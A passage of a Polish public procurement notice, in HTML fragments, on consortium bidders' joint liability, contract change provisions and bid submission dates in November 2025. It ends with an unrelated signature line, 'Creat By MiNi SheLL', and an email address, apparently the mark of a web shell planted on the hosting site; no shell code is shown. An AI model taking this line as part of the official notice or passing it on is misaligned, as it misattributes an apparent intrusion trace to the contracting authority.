spółki cywilnej,<br/>konsorcja itp.) ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie należytego<br/>wykonania umowy.<br/>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wszyscy Wykonawcy występujący wspólnie muszą upoważnić ustanowionego pełnomocnika na<br/>piśmie (zgodnie z art. 99 Kodeksu Cywilnego), jako przedstawiciela pozostałych Wykonawców, a<br/>pełnomocnictwo podpisane przez wszystkie strony należy dołączyć do składanej oferty.<br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców<br/>występujących wspólnie, tzn. musi być podpisana przez wszystkich Wykonawców bądź z treści<br/>upoważnienia musi wynikać, iż wyznaczony lider ma prawo do podpisywania oferty oraz innych<br/>dokumentów (w tym umowy) w imieniu wszystkich Wykonawców.<br/>Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą<br/>występującym jako pełnomocnik pozostałych (lider). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonywania zmian w umowie (poza wskazanymi w art. 455 ustawy PZP) w przypadku zaistnienia którejkolwiek z niżej wymienionych okoliczności - szczegóły wskazano w SWZ w rozdziale XII <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-18 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://malopolskapsp.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-18 13:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com